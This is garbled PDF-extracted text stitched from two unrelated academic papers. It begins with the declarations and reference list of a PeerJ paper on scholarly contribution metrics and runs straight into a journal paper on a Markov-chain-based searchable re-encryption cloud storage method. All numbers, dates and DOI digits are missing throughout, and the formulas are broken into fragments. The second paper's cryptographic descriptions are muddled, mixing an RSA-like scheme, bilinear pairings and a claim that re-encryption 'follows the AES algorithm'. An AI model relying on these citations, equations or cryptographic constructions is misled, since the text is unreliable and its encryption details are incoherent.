declarations funding this work was supported by the fund for promoting the reform of higher education by using big data technology, energizing teachers and students to explore the future ( a ), the fundamental research funds for the central universities (dut jc ), liaoning provincial key r&d guidance project ( ), and the liaoning provincial natural fund guidance plan ( ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: using big data technology, energizing teachers and students to explore the future: a . fundamental research funds for the central universities: dut jc . liaoning provincial key r&d guidance project: . liaoning provincial natural fund guidance plan: . competing interests xiangjie kong is an academic editor for peerj. author contributions • xiangjie kong conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • lei liu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • shuo yu performed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. • andong yang analyzed the data, authored or reviewed drafts of the paper, approved the final draft. • xiaomei bai and bo xu conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the raw code are available in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alvarez-rodríguez jm, colomo-palacios r. . assessing professional skills in a multi-scale environment by means of graph-based algorithms. in: european network intelligence conference. piscataway: ieee, – . anderson ka. . skill networks and measures of complex human capital. pro- ceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . atkins h. . author credit: plos and credit update. the official plos blog. available at https://blogs.plos.org/plos/ / /author-credit-plos-and-credit- update/ . biswal ak. . an absolute index (ab-index) to measure a researcher’s useful contri- butions and productivity. plos one ( ):e doi . /journal.pone. . bornmann l, daniel hd. . does the h-index for ranking of scientists really work? scientometrics ( ): – doi . /s - - - . bu j, tan s, chen c, wang c, wu h, zhang l, he x. . music recommendation by unified hypergraph: combining social media information and music content. in: acm international conference on multimedia. new york: acm, – . corrêa jr ea, silva fn, costa ldf, amancio dr. . patterns of authors con- tribution in scientific manuscripts. journal of informetrics ( ): – doi . /j.joi. . . . dance a. . authorship: who’s on first? nature ( ): – doi . /nj - a. egghe l. . theory and practise of the g-index. scientometrics ( ): – doi . /s - - - . farhadi f, sorkhi m, hashemi s, hamzeh a. . an effective expert team formation in social networks based on skill grading. in: ieee international conference on data mining workshops. piscataway: ieee, – . kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /pnas. https://blogs.plos.org/plos/ / /author-credit-plos-and-credit-update/ https://blogs.plos.org/plos/ / /author-credit-plos-and-credit-update/ http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /nj - a http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. ferreira aa, gonçalves ma, laender ah. . a brief survey of automatic meth- ods for author name disambiguation. acm sigmod record ( ): – doi . / . . gosset ws. . the probable error of a mean. biometrika ( ): – doi . /biomet/ . . . hirsch je. . an index to quantify an individual’s scientific research output. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . huang y, liu q, zhang s, metaxas dn. . image retrieval via probabilistic hyper- graph ranking. in: proceedings of computer vision and pattern recognition. piscataway: ieee, – . jones e, oliphant t, peterson p. . scipy: open source scientific tools for python. available at http://www.scipy.org/ (accessed on november ). kang is, na sh, lee s, jung h, kim p, sung wk, lee jh. . on co-authorship for author disambiguation. information processing & management ( ): – doi . /j.ipm. . . . kong x, jiang h, wang w, bekele tm, xu z, wang m. . exploring dynamic research interest and academic influence for scientific collaborator recommendation. scientometrics ( ): – doi . /s - - - . kong x, jiang h, yang z, xu z, feng x, tolba a. . exploiting publication con- tents and collaboration networks for collaborator recommendation. plos one ( ):e doi . /journal.pone. . kong x, mao m, wang w, liu j, xu b. . voprec: vector representation learning of papers with text information and structural identity for recommendation. ieee transactions on emerging topics in computing epub ahead of print apr doi . /tetc. . . lee i, xia f, roos g. . an observation of research complexity in top universities based on research publications. in: international world wide web conference. new york: acm, – . li l, li t. . news recommendation via hypergraph learning: encapsulation of user behavior and news content. in: proceedings of the sixth acm international conference on web search and data mining. new york: acm, – . li l, tong h, cao n, ehrlich k, lin y-r, buchler n. . enhancing team composition in professional networks: problem definitions and fast solutions. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . liang r, jiang x. . scientific ranking over heterogeneous academic hypernetwork. in: thirtieth aaai conference on artificial intelligence. menlo park: aaai, – . liu j, dolan p. . personalized news recommendation based on click behavior. in: international conference on intelligent user interfaces. new york: acm, – . liu z, huang h, wei x, mao x. . tri-rank: an authority ranking framework in heterogeneous academic networks by mutual reinforce. in: proceedings of th international conference on tools with artificial intelligence. piscataway: ieee, – doi . /ictai. . . kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /biomet/ . . http://dx.doi.org/ . /pnas. http://www.scipy.org/ http://dx.doi.org/ . /j.ipm. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tetc. . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /ictai. . http://dx.doi.org/ . /peerj-cs. meng q, kennedy pj. . discovering influential authors in heterogeneous academic networks by a co-ranking method. in: acm international conference on conference on information & knowledge management. new york: acm, – . milojević s. . principles of scientific research team formation and evolution. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . nicolini d, mengis j, swan j. . understanding the role of objects in cross- disciplinary collaboration. organization science ( ): – doi . /orsc. . . pan rk, fortunato s. . author impact factor: tracking the dynamics of individual scientific impact. scientific reports : doi . /srep . paul-hus a, mongeon p, sainte-marie m, larivière v. . the sum of it all: revealing collaboration patterns by combining authorship and acknowledgements. journal of informetrics ( ): – doi . /j.joi. . . . pearson k. . note on regression and inheritance in the case of two parents. proceed- ings of the royal society b: biological sciences : – doi . /rspl. . . persson ra. . bibliometric author evaluation through linear regression on the coau- thor network. journal of informetrics ( ): – doi . /j.joi. . . . rahman mt, mac regenstein j, kassim nla, haque n. . the need to quantify authors’ relative intellectual contributions in a multi-author paper. journal of informetrics ( ): – doi . /j.joi. . . . sauermann h, haeussler c. . authorship and contribution disclosures. science advances ( ):e . sawilowsky ss. . s-index: a comprehensive scholar impact index. international review of social sciences & humanities ( ): – . sekercioglu ch. . quantifying coauthor contributions. science ( ): doi . /science. . . a. sinatra r, wang d, deville p, song c, barabási al. . quantifying the evo- lution of individual scientific impact. science ( ):aaf –aaf doi . /science.aaf . suo q, sun s, hajli n, love ped. . user ratings analysis in social networks through a hypernetwork method. expert systems with applications ( ): – doi . /j.eswa. . . . theodoridis a, kotropoulos c, panagakis y. . music recommendation using hypergraphs and group sparsity. in: acoustics, speech and signal processing (icassp), ieee international conference on. piscataway: ieee, – . wang w, yu s, bekele tm, kong x, xia f. . scientific collaboration patterns vary with scholars’ academic ages. scientometrics ( ): – doi . /s - - - . wang x, zhao z, ng w. . ustf: a unified system of team formation. ieee transac- tions on big data ( ): – doi . /tbdata. . . xia f, wang w, bekele tm, liu h. . big scholarly data: a survey. ieee transactions on big data ( ): – doi . /tbdata. . . kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /orsc. . http://dx.doi.org/ . /srep http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /rspl. . http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /science. . . a http://dx.doi.org/ . /science.aaf http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tbdata. . http://dx.doi.org/ . /tbdata. . http://dx.doi.org/ . /peerj-cs. yao l, sheng qz, ngu ah, li x. . things of interest recommendation by leveraging heterogeneous relations in the internet of things. acm transactions on internet technology ( ):article . yegros-yegros a, rafols i, d’este p. . does interdisciplinary research lead to higher citation impact? the different effect of proximal and distal interdisciplinarity. plos one ( ):e doi . /journal.pone. . yu j, tao d, wang m. . adaptive hypergraph learning and its application in image classification. ieee transactions on image processing a publication of the ieee signal processing society ( ): – doi . /tip. . . zhou w, zhu y, javed f, rahman m, balaji j, mcnair m. . quantifying skill relevance to job titles. in: ieee international conference on big data. piscataway: ieee, – . kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /peerj-cs. l 引言 international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - searchable re-encryption cloud storage method based on markov chain wang hui a , wang zhongsheng b school of computer science and engineering, xi’an technological university, xi’an, , china e-mail: a @qq.com; b @qq.com li jinguang department of information technology shaanxi heavy duty automobile co.ltd xi 'an, , shaanxi, china abstract—cloud storage is an emerging paradigm that offers on-demand, flexible, and elastic computational and storage services for the terminal users. when the large amount of data increases dramatically, the storage efficiency of the system would be decreased seriously. in this paper a new method of srecsm(searchable re-encryption cloud storage method) based on markov chain is proposed. it predicts periodically by using the steady markov strategy in stages and easy to select the optimal storage node. the data is scheduled to store in the node with the lowest cost in real time, and the node is selected to implement cloud storage access on mobile terminal. by using searchable re-encryption method, srecsm has increased the storage requirement flexibility and minimize cost and searching time. and then the reliability model of srecsm is established. simulation results show that srecsm introduced in this paper has the ability to predict accurately when the size of the data is different. moreover, the influence of storage efficiency is reduced effectively through srecsm when different size of the data is stored in storage nodes regardless of the storage cost. it is verified that the srecsm based on markov chain has higher reliability. keywords-cloud storage; markov chain; re-encryption; reliability model i. introduction in order to meet the various storage demands, cloud storage is designed to store data in cloud and is widely used in the internet. compared with traditional data storage, it greatly improves the efficiency of the mass data storage and utilization of network resource. however, access from a mobile device to data, stored in a cloud, leads to poor client quality experience [ - ]. it is essential to reduce user download wait time for a requested file from a network to enhance client quality experience. as a result, cloud storage techniques are quite challenging. on one hand, storage density of the cloud storage is not big and the comprehensive storage efficiency is low. on the other hand, the high latency limited the use of mobile cloud storage, especially for the applications with frequent random accesses to a large set of small files. therefore, cloud storage faces serious security and efficient problems [ - ]. traditional cloud storage systems do not adapt well to different application environment and does not guarantee the integrity and confidentiality of cloud data. in other words, the cloud storage service does not guarantee that the data and operation of mobile users will not be lost, damaged, leaked, or illegally exploited by malicious or nonmalicious. therefore, it's very dangerous for sensitive data to be stored directly in the cloud. the reliability of the mobile cloud storage depends on the extent of the impact on system storage efficiency while the storage solution fails [ ]. therefore, storing sensitive data on untrusted server is a challenging issue [ ]. simple encryption techniques have key management issues and which can't support complex requirements such as query, parallel modification, and fine-grained authorization. to guarantee confidentiality and proper access control of sensitive data, classical encryption are used [ - ]. to solve the problems brought by the hysteretic and density of tranditional storage methods in the cloud storage system, in this paper, srecsm, searchable re-encryption mailto:a.author@email.com international journal of advanced network, monitoring and controls volume , no. , cloud storage method is proposed using the idea of markov chain. in this method, instead of using traditional storage, a proactive storage approach is adopted to avoid delayed storage. in addition, the srecsm predicts periodically to increase the effiency of cloud storage. the major contribution of our work includes:  searchable re-encryption cloud storage method based on markov chain is proposed and built as a srecsm model. in order to find out the optimal storage policy in the cloud, an optimization problem is formulated as a markov chain. the srecsm model is designed to predict periodically by using the steady markov strategy in stages and determine the lowest storage cost by which the storage benefit can be maximized.  a value iteration algorithm of srecsm is presented for computing the stationary deterministic policy. the data is scheduled to be stored in the node with the lowest storage cost in real time. therefore, the optimal storage node must be selected to implement cloud storage access on mobile terminal.  the central idea of the searchable re-encryption is proposed, which is to generate a re-encryption key and decrypt while the keyword matched. the objective of the proposed searchable re-encryption method is to increase the storage requirement, flexibility and reduce the security issues, overhead ratio and minimize the cost and searching time.  the reliability of srecsm model is proposed and analyzed. because of the large scale of the cloud storage system, method of monte carlo simulation is adopted in the reliability evaluation of the cloud storage system.  we conduct a series of experiment to validate the effectiveness, performance and robustness of srecsm. results show that the present approach can store mass data in cloud system effectively and securitily. the rest of the paper is organized as follows. in section , related work is discussed. section , searchable re-encrypption cloud storage method based on markov chain is proposed. section describes the searchable re-encryption method in srecsm. section presents the basic prototype system of srecsm and simulation experiments. in addition, the security, performance and robustness of srecsm are analyzed. section concludes the paper. ii. related work efforts have been taken by researchers, developers, practitioners, and educators to identify and discuss the technical challenges and recent advances related to cloud storage. han et al. proposed [ ] multi-path data prefetching in mobile cloud storage. multi-path prefetching tend to prefetch more successors to ensure high prefetching hit rate and efficiency, and achieve a higher overall throughput performance of accessing cloud storage services via mobile network. based on cloud storage, lee et al. [ ] designed an efficient delta synchronization (eds) algorithm for mobile cloud storage applications, which can aggregates the updated data to reduce the synchronization traffic and synchronizes the aggregate done periodically to satisfy the consistency. wang et al. [ ] presented an optimized replica distribution method (ordm) in cloud storage system. zhang et al. [ ] conducts modeling analysis of a cloud storage system, and proposes a markov decision process modeling framework to analyze the reliability of the storage system. chen et al. [ ] proposed a new metric called joint response time, which not only considers the waiting time when the requested data are unavailable but also the queuing delay and service time when data become available. these methods mentioned above achieve cloud storage, but the cloud storage according to data size based on markov is not considered. aiming at the problem that the cloud storage according to data size based on markov, srecsm is proposed in this paper to satisfy the cloud storage periodically. most of the existing security schemes that are designed for mobile cloud storage environment are based on traditional cryptographic methods or pairing-based cryptography. the further deployment of cloud storage is limited by its security risks. the schemes presented in international journal of advanced network, monitoring and controls volume , no. , [ - ], and [ , ] provided the security features for mobile user in the cloud environment using the traditional cryptography methods. the rest of the security schemes discussed in [ - ], and [ ] are based on pairing based cryptography for secure offloading of the data access operations on the cloud in a trusted mode. few of the schemes presented in the classification execute the entire security operations on the mobile device. the rest of the schemes delegate the security management operations on the cloud, trusted entity under the control of client organization, or trusted entity ender the control of the third party. in the category of local execution, a small number of schemes focus on the reduction of computational complexity of cryptography algorithms for reducing the processing burden from the mobile device. zhao et al. [ ] proposed a method for trusted data sharing on untrused cloud servers using progressive elliptic curve encryption(pece) scheme. the pece allows the encryption of message multiple times with different keys that can be decrypted in a single run with a single key. ren et al. [ ] provide the security features for mobile user in the cloud environment using the traditional cryptography methods. the focus of the proposed schemes is to reduce the computational complexity of the cryptography operations instead of offloading the computationally intensive operations on the cloud. the size of the ciphertext grows linearly with increase in number of ciphertext attributes. [ ] that involves more pairing evaluation exponential operations while decrypting the ciphertext. however, the data owner has to transform the plaintext into ciphertext, and vice versa that involves execution of computationally intensive multiplication and exponential operations of large numbers on resouce constraion mobile device. [ - ] propose proxy re-encryption algorithm to confirm the security of the data in the cloud, which can alleviate the client's burden, and enhance the confidentiality of cloud data. however, there are two major disadvantages with these techniques. first, for re-encryotion, the data owner must obtain user's public key before uploading. second, because the same plaintext is used with different keys generated by proxy, therefore, the storage overhead becomes excessive. a manager-based re-encryption scheme (mres) defined in [ ] achieves the data confidentiality for the mobile users by using the proxy re-encryption strategy. the proxy re-encryption helps the mobile user to delegate the data access operation on third party. another cryptographic scheme defined by tysowski and hasan in [ ] is cloud-based re-encryption scheme (cres). the proposed scheme covers the limitations of the existing manager-based re-encryption scheme and the variations of manager-based re-encryption based on user-managed key ciphertext fetch by user. but these two schemes are more complex and need more time to re-encrypt. to optimize the cloud storage, safety transmission, minimize the cost and computational complexity, here we have proposed a new scheme as searchable re-encrypted data in srecsm. this technique is more simple and faster when sorting the arrays using the most significant radix sort. this technique will reduce the cost of the data owners up to o(nt* ) and the time complexity will be reduced up to the o (b), where b denotes the bucket size of the data base. iii. construction of srecsm model the transfer probability of markov chain is introduced into the cloud storage. the stored procedure in the cloud system is similar to the markov process. therefore, a searchable re-encryption cloud storage method based on markov chain is proposed in this paper, which can realize reliable and safe storage on mobile terminal. from the probability point of view, the data is scheduled to be stored in the node with the lowest storage cost in real time. firstly, the storage state of srecsm is divided and three state models are obtained in the paper. according to the storage cost of the nodes for storing different size file, the state matrix in current time is got by using the steady state of markov strategy. the state transfer probability matrix is calculated with the support of a sufficient number of samples. the storage state probability of srecsm can be predicted quickly in the future. therefore, the optimal international journal of advanced network, monitoring and controls volume , no. , storage node is selected to implement cloud storage access on mobile terminal. when a request is made by a mobile terminal, the storage node which has the lowest cost is selected for storing. the srecsm can save time and improve storage efficiency effectively. and at the same time the load balancing of the system is also guaranteed. a. the finite state space and the state distribution the markov chain is a discrete random process with markov properties. the next state of the random process is only related to the current state, not its historical state. therefore, the distribution of the future state of the random process depends only on the present, not the past. the srecsm based on markov chains consists of the following three parts  prs ,, . in which s is the finite state space; r stands for the state distribution; p is the probability of state conversion. the server in the cloud storage group is named storage node. each node can store large files, medium files, and small files. files stored over mb is called a large file, files no more than mb are defined as small files, files between mb and mb are defined as secondary files. the storage nodes are different in hardware performance, load situation, network link state and so on. therefore, each storage node has different storage cost for storing large data, secondary data, and small data. that is, the storage cost for storing different size of files in each node is different. in the cloud system, depending on the size of the storage data file, each node has different storage costs for large, secondary and small files, and then the optimal storage node is selected accordingly. based on the analysis above, the srecsm based on markov chain is proposed in this paper. the processes of the storage that store three different sizes of data in a storage cluster are treated as space s which is discrete state. moreover, in the procedures of data storing, the selection of the next storage node is only related to the storage cost of the current storage node. therefore, the data stored procedure of cloud system conforms to the characteristics of markov chain. in the srecsm proposed in this paper, the state space s is expressed as the following three types. state (small file status): in the state of small file status, the optimal storage node for storing small files in a storage group cluster is selected to implement data storage. state (secondary file status): in the state of secondary file status, the optimal storage node for storing secondary files in a storage group cluster is selected to implement data storage. secondary files are between a small file and a large file. state (large file status): in the state of large file status, the optimal storage node for storing large files in a storage group cluster is selected to implement data storage. the state space of the cloud storage based on markov chain is defined in formula ( ).    ,, ssss   in formula ( ), s denote the storage cost for storing small file on each storage node in the cluster, s denote the storage cost for storing secondary file on each storage node in the cluster, and s denote the storage cost for storing large file storage on each storage node in the cluster. moreover, according to the probability rule, the more detailed the storage state of the cloud storage system is, the more explicit the guidance of the data storage solution prediction will be. however, the greater the burden of computing resources needed for partitioning the state of the cloud system storage scheme. as we can see, in implementing the choice of cloud storage solutions, the degree of partitioning the storage state in cloud system storage scheme is a compromise decision problem. the more detailed the storage state is the more simplification is needed to reduce the computational burden. and the more storage states are, the greater the redundancy of the storage scheme. therefore, the approach of partitioning the storage state not only complicates the analysis, but also reduces international journal of advanced network, monitoring and controls volume , no. , storage speed. in fact, storage status can't be considered completely, and it is difficult for the srecsm to achieve multiple storage state ultimately. therefore, in the study of the srecsm, the partitioning of the storage state is appropriate. obviously, the storage state defined in this paper can be divided into three state, those are large file status, middle file status and small file status. whether for the actual data of the project or the simulation analysis, these three states are relatively simple and can better satisfy the requirement of data storage in cloud system. the storage group has an irregular connection to the network. the distribution matrix of the storage state in the cloud system is defined as r . and each data in the matrix is the storage cost on a certain storage node for data storing. therefore, according to the storage cost of the nodes in large, medium and small three different states, the distribution matrix  ir of the storage status at time i t can be obtained. the matrix  ir is to be defined in formula ( ).                t i i i t stxr stxr stxr is is is ir                          )( )( )(  b. the probability matrix of the state transfer the number of states in the state space is denoted with n . therefore, the transfer probability can be represented in the form of matrix, which is defined as the probability matrix of state transfer. the probability matrix p of the state transfer always keeps the same. moreover, and p is the matrix of order n . if the interval among n ttt ,,,  are always the same, according to homogeneity, p is defined in ( ).               nnnn n n ppp ppp ppp p      obviously, the transfer probability matrix has two properties, which are shown in formula ( ).               n j ij ij nitp njitp ,, , ,, , ,    in equation ( ), ij p refers to the probability of transition from the state i s to the other state j s . the sum of each row in the probability matrix is one. moreover, the sum of the probabilities from the storage state i s to all the other storage states j s is one too. according to the analysis previous, each storage node in a storage group has different storage costs for storing three different size files. therefore, in the cloud system, if a large, medium, and small files are need to be stored in the storage node, the higher the cost of integrated storage, the less likely this node is used to store data. on the contrary, the smaller the storage cost of the node for storing large, medium and small files, the more likely the node will be selected. the state space of srecsm is represented in ( ). the storage status transfer can be shown in figure . small file status large file status secondary file status p p p p p p -p -p -p -p -p -p figure . storage status transition diagram according to the probability values of the transformation in three different states of the storage node, the probability matrix of the state transfer in the srecsm is shown in formula ( ). international journal of advanced network, monitoring and controls volume , no. ,                pppp pppp pppp p  c. algorithm of srecsm users access the network through a mobile terminal, and the mobile terminal will choose to communicate with the node which has the lowest cost in the storage group. moreover, irregular connection is used in the storage group. therefore, in order to improve the reliability of the cloud storage system, a multi-replica mechanism is introduced. the storage efficiency of the cloud system can be effectively improved by using multi-replica mechanism. when a mobile terminal makes a request, a copy with the lowest cost can be chosen. however, in the traditional cloud storage system, the master copy is selected first only when the master copy is wrong. the request will then be sent to the backup copy regardless of the region. therefore, this kind of storage will affect the speed of the cloud system. based on this idea, the transfer probability of markov chain is used in the srecsm. the storage cost of each storage node is measured from the perspective of probability. the state matrix of one-step transfer will then be obtained by means of the probability matrix of the state transfer. finally, the state matrix of multi-step transfer will be obtained to predict the probability of the storage cost at a certain time in the srecsm. therefore, the optimal storage node will be chosen to realize the data storage at the end. the main idea of the srecsm algorithm in the cloud system will be introduced in the following chapter. the states of the storage in the strategy are proposed for the implementation of the data storage. moreover, in the srecsm algorithm of the cloud system, the standard of storage status division is proposed, which is convenient for engineering implementation. at the same time, the transfer expression of the state corresponding to the storage state is obtained. then, on the base of the historical data stored in the cloud system, the probability matrix of state transfer is obtained. the probability and reliability of the storage status in the cloud system at some time in the future are predicted by using the probability matrix of the state transfer and the matrix of the storage state at the moment. the steps of the algorithm of the srecsm based on markov chain are described as follows: step the distribution matrix   r of the srecsm at the initial time t is obtained. step according to the distribution matrix of the storage state and the probability matrix p of the state transition at t time, the state distribution matrix of one-step transfer   r at next time will be got after t time. the state distribution matrix of one-step transfer   r is shown in formula ( ).     prr   step obviously, the storage distribution of the cloud storage system after t time is shown in formula ( ).        prprr   after a period of time, about m times t time, the storage status of cloud system is shown in formula ( ).        mprpmrmr   through the procedure above,   r and p are known, the steady-state value of the cloud storage distribution in the system can be predicted quickly in the future after every t time interval. according to the storage cost of data stored in different nodes, the storage cost matrix of the current time of the system is obtained, which is the state distribution matrix of the system. the state distribution matrix is shown in formula ( ). international journal of advanced network, monitoring and controls volume , no. ,                t i i i t stxr stxr stxr is is is ir                          )( )( )(  in formula ( ), is represents the storage cost needed to select a storage node at time it . we can know from formula ( ) that is is contained within the range of to , which satisfies the inclusion relationship   , is . and i s is obtained by normalizing the correlation property, which is stored in the node at it time. there are three variables in related properties at time t. three variables are represented by symbols q , d and l , which respectively represent the length, latency and packet loss of stored data respectively. the storage cost of the node will be got in formula ( ).  llddqq ssss    in formula ( ), three variables q , d and l satisfies the relationship in formula ( ).       ldqk k ,,   because parameters including q , d and l are all cost indicators. therefore, the smaller the value, the better the quality of the data stored in this node. the storage cost will be got in formula ( ) in this way.    ldqk kk kk s k ,, minmax max      in formula ( ), q is obtained by the length of the stored data block. the parameters d and l are obtained by timing first, and then calculated through the time. start the timer when each data block is stored at the beginning of the storage till the response is received. therefore, the evaluation of the storage quality in each storage node is carried out through the above method. moreover, and the distribution matrix of the storage status is updated in stages. the pseudo-code of the algorithm in srecsm is described in figure . figure . pseudo-code in srecsm therefore, in the srecsm based on markov chains, the distribution of the state in the future will be got by means of the probability matrix p of the state transfer and the distribution matrix   r of the state at the initial time. the distribution of the storage state at time nt will be calculated and the choice of srecsm will be realized through matrix operation. international journal of advanced network, monitoring and controls volume , no. , iv. searchable re-encryption method the central idea of the searchable re-encryption is to generate a re-encryption key and decrypted while the keyword matched. by using searchable re-encryption method, srecsm has increased the storage requirement due to the storing of all encrypted data. the objective of the proposed searchable re-encryption method is to increase the storage requirement, flexibility and reduce the security issues, overhead ratio and minimize the cost and searching time. this technique will not provide the effective data utilization. this technique is more simple and faster when sorting the arrays using the most significant radix sort. this technique will reduce the cost of the data owners and the time complexity will be reduced. this technique is more efficient and requires more storage space for the data. a. symbol definitions symbols in the searchable re-encryption method are defined in the in table i. table i. symbol definition symbol definition pr(k) private key enabled by data owners pu(k) public key enabled by data owners kw keyword db database {all the data passed to the cloud servers will be stored here} ek editing keyword ed encrypted data pr(k)re re-encryptedprivate key pu(k) re re-encrypted public key ed re re-encryptedencrypted data dd decrypted data kw(pu) keyword assigned with the public key kw(pr) keyword assigned with the private key do data owners (sender) du data users (receiver) cs cloud server (third party user) b. keyword editing by searching the keyword we can edit the keyword with the help of three notations. while editing the keyword it requires, insertion, deletion or substitution. here assuming the notation as n and editing the keyword as ek . case if ~= ( )ek n i inserting the character into the first place for example: character string (old) = ‘‘bok’’ if = i ; ~= ( )ek n in third place have to insert new character character string (new) = ‘‘book’’ case if ( )ek n i deleting the character into the first place for example: character string (old) = ‘‘bok’’ if = i ; ( )ek n in third place have to delete the letter character string (new) = ‘‘bo’’ case if ( )ek n i substitute the character into the first place for example: character string (old) = ‘‘bok’’ if = i ; ( )ek n in third place have to substitute a new character character string (new) = ‘‘bok’’ these three different notations help in editing the keyword easily. if the data users apply the keyword with some mistakes, they can edit the keyword to recover their respective data by using these three different cases. c. searchable re-encryotion the central idea of the searchable re-encryption is to generate a re-encryption key and decrypte while the keyword matched. re-encryption operates over two groups g and g of prime order q with a bilinear map e : g g g  . the system parameters are random generators international journal of advanced network, monitoring and controls volume , no. , g g and   ,z e g g g  . the searchable re-encryption can be defined in the following algorithms. algorithm follows that the searchable re-encrypted keyword and it will search the keyword to decrypt the files. if the keyword matched, the data can be decrypted and can bereceived and accessed by the users. algorithm keyword searching input: keyword for ( )pr k output: keyword matched if ( )pr k kw goto  db i else if ( )ek n i \\ case- goto  db i else "not matching" end if ( )ek n i \\ case- "keyword matched" initially private key contains the keyword and that keyword will be searched in the database. keyword with the private key should be verified in the database of data cloud storage. data owners will transmit the data to the cloud servers and the cloud server will store the data in the database. the data users will receive the data from the database using the keyword. if the keyword did not match, data user use the editing scheme for insertion, deletion and substitution. if the keyword matched, data users will receive the data from the cloud servers which is explained in the algorithm . algorithm data sharing generate ( )pu k ( )pr k   ( )= ,pu k ed kw pu   ( )=pr k kw pr do shares ( )pu k to cs do shares ( )pr k to du send ed to cs du sends  kw pr to cs cs verify  kw pr if  kw pu =  kw pr cs sends   ,dd kw pr to du algorithm states that the data file sharing between the data owners and data users through the cloud server. initially data owners will create the public key and private key. the public key will be shared to the cloud servers and the private key will be shared to the data users. every private and public key has its own keyword based on that keyword the data users will retrieve the data. if the keyword of public key and keyword of private key is matched, cloud server will transmit the data to the data users. algorithm data encryption consider two prime numbers as x and y assign z x y  , where z will be used for the modulo of private and public keys assign euler’s function as    ( ) e z x y   consider an integer as i such that   i e z  for all   , i e z  where i and  e z are co-prime assign   , , , nd f f f  ; f as files, d as data and n as number of files.          , , , nd z f z f z f z  encrypted data,     ; ,zed d z mod e kw pu k international journal of advanced network, monitoring and controls volume , no. , algorithm states that the data encryption scheme and this follows the rsa algorithm to encrypt the data. initially the module multiplication of the two prime numbers will be calculated and this states that the euler’s function and this integer value is co-prime. each data will be encrypted with modulo of e (z). the encrypted data contains the public key and the private keyword and the each data will be modulo with the euler’s function. algorithm data re-encryption generate   re pr k ,   re pu k assign   , , , nd f f f  , g g ; f as files, d as data and n as number of files.          , , , nd z f z f z f z  re-encrypted data, re ( ) ( ( ), ( )) a a ed c e pu k ed c algorithm states that the data re-encryption scheme and this follows the aes algorithm to encrypt the data. the mobile user 'a' generates the re-encryption keys for authorized user's list 'u' using users' public key and personal private key as shown below: re re ( ) ( ) ( ) ,i a x x i pu k pr k g u u    the csresm generates the * i q r z randomly and encrypts the message using the following procedure: ( ) i i r r new z z pu k  ( ) ( )i i r r new ed z z m   ( ) , ( )i i a r r x ed c z m ed ca g   the csresm uploads the encrypted message ' ( )ed c ' and ' ( ) a ed c ' on behalf of the mobile user 'a'. the csresm transforms ' ( ) a ed c ' into ' ( ) a re ed c ' using the re-encryption key re( )pu k and ( )aed c as shown in the following equation: re ( ) ( ( ), ( )) a a ed c e pu k ed c = , ( ) i a a i x x x r e g g = ( ) i i x r e g g, algorithm data decryption consider d key =  ( ),pr k kw for f  to n //data files   dd ed mod pr k end for f loop goto dd algorithm states that the data decryption algorithm to decrypt the data using the above steps. initially data users uses the decryption key and that decryption key contains private key with keyword. select the number of files and then decrypt the data using modulo function. each data will be decrypted using the decryption key. d. security analysis assuming that the reliability of the cloud storage system is identified by symbol a . the time of encryption through different encryption algorithms is t a , the encryption time t a is reversed first , and after the normalization processing , j a is got from t a . according to the markov chain, the storage cost of the different node is normalized to be the value k a . the number of the storage states for the cloud storage is the value n the reliability model of the system is shown in formula ( ).  ]) ( ][) ( [ n k n j aaa   international journal of advanced network, monitoring and controls volume , no. , it can be concluded from the analysis of the reliability model. when the valet tends to be infinite, which means t , the storage cost of the node in the cloud system also tends to a certain stable value, and the state of storage strategy tends to be stable. when the value of j a and k a are more closer to , and the value of n is more large, the cloud storage system will be more reliable and with higher security. v. prototype system and experiment a. prototype system hdfs and dynamo are reliable solutions that are commonly used in the cloud storage system. hdfs is a distributed file system that is suitable for running on common hardware. moreover, hdfs has good fault tolerance and can be used for inexpensive hardware. the program in hdfs has a lot of data sets. the file size in the hdfs is typically gigabyte to terabyte. as a result, terabytes of large files can be supported in hdfs through higher aggregated data bandwidth. therefore, hundreds of nodal devices can be contained in a cluster, which allowing the terabytes of large files to be supported in it. the consistency hash algorithm is used by dynamo. at that time, it's not the exact hash value, but a range of hash values. when the hash value of the key is in this range, it will be searched clockwise along the loop, and the first node encountered is what we need. the consistency hash algorithm is improved by dynamo, and in the ring,a set of devices are acted as a node rather than only one device is acted as a node. the synchronization mechanism is used to achieve the consistency of the data. in hdfs, numbers of the copies are set to be three. 